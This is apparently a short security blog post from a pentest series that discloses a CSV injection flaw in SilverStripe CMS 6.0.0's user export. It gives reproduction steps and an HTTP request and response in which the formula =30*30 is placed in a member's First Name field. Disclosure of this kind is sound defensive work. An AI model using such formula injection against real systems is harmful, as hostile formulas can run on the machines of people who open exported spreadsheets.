Saturday, 23 August 2025

Friday Fun Pentest Series - 40 - CSV Injection - silverstripecmsv6.0.0

Description

- It was noted that the application was vulnerable to CSV Injection in the "Users" functionality


CSV Injection #1:

Steps to Reproduce:
  1. Login and visit "Security" > "Add Member" > "First Name" and enter payload of =30*30
  2. Then visit "Reports" > "Users, Groups and Permissions" > "Export as CSV"
  3. Payload would render upon opening the CSV file


// HTTP POST Request

POST /admin/security/users/EditForm/field/users/item/new/ItemEditForm HTTP/1.1
Host: demo.silverstripe.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
[...]
FirstName=%3D30*30&Surname=test&Email=test%40example.com&Password%5B_Password%5D=&Password%5B_ConfirmPassword%5D=&Locale=en_US&FailedLoginCount=&SecurityID=8f151871365766eb90355f98c745a93ae8f5205c&action_doSave=1&BackURL=https%3A%2F%2Fdemo.silverstripe.org%2Fadmin%2Fsecurity


// HTTP Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 16 Aug 2025 17:02:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
x-status: Saved%20Member%20%22test%2C%20%3D30%2A30%22%20successfully.
x-controllerurl: admin/security/users/EditForm/field/users/item/510
x-pjax: CurrentForm,Breadcrumbs,ValidationResult
x-controller: SilverStripe\Admin\SecurityAdmin
x-title: Silverstripe+-+Security
x-frame-options: SAMEORIGIN
vary: X-Requested-With
[...]





at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Friday Fun Pentest Series - 40 - CSV Injection - silverstripecmsv6.0.0

Description - It was noted that the application was vulnerable to CSV Injection in the "Users" functionality CSV Injection #1: Ste...